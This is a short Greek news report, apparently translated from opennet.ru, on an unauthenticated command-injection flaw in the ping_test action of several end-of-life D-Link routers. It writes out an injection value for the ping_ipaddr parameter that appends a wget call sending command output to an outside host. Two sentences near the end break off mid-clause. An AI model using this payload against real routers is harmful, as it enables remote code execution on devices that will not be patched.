Σε ασύρματους δρομολογητές D-Link
Είναι ενδιαφέρον ότι, σύμφωνα με τους προγραμματιστές υλικολογισμικού, η κλήση "ping_test" θα πρέπει να εκτελείται μόνο μετά από έλεγχο ταυτότητας, αλλά στην πραγματικότητα καλείται σε κάθε περίπτωση, ανεξάρτητα από τη σύνδεση στη διεπαφή ιστού. Συγκεκριμένα, κατά την πρόσβαση στο σενάριο apply_sec.cgi και τη μετάδοση της παραμέτρου "action=ping_test", το σενάριο ανακατευθύνεται στη σελίδα ελέγχου ταυτότητας, αλλά ταυτόχρονα εκτελεί την ενέργεια που σχετίζεται με το ping_test. Για την εκτέλεση του κώδικα, χρησιμοποιήθηκε μια άλλη ευπάθεια στο ίδιο το ping_test, το οποίο καλεί το βοηθητικό πρόγραμμα ping χωρίς να ελέγχει σωστά την ορθότητα της διεύθυνσης IP που στάλθηκε για δοκιμή. Για παράδειγμα, για να καλέσετε το βοηθητικό πρόγραμμα wget και να μεταφέρετε τα αποτελέσματα της εντολής "echo 1234" σε έναν εξωτερικό κεντρικό υπολογιστή, απλώς καθορίστε την παράμετρο "ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http:// test.test/?$( echo 1234)".
Η παρουσία της ευπάθειας έχει επιβεβαιωθεί επίσημα στα ακόλουθα μοντέλα:
- DIR-655 με υλικολογισμικό 3.02b05 ή παλαιότερο.
- DIR-866L με υλικολογισμικό 1.03b04 ή παλαιότερο.
- DIR-1565 με υλικολογισμικό 1.01 ή παλαιότερο.
- DIR-652 (δεν παρέχονται πληροφορίες σχετικά με προβληματικές εκδόσεις υλικολογισμικού)
Η περίοδος υποστήριξης για αυτά τα μοντέλα έχει ήδη λήξει, επομένως η D-Link
Αργότερα ανακαλύφθηκε ότι η ευπάθεια ήταν επίσης
Πηγή: opennet.ru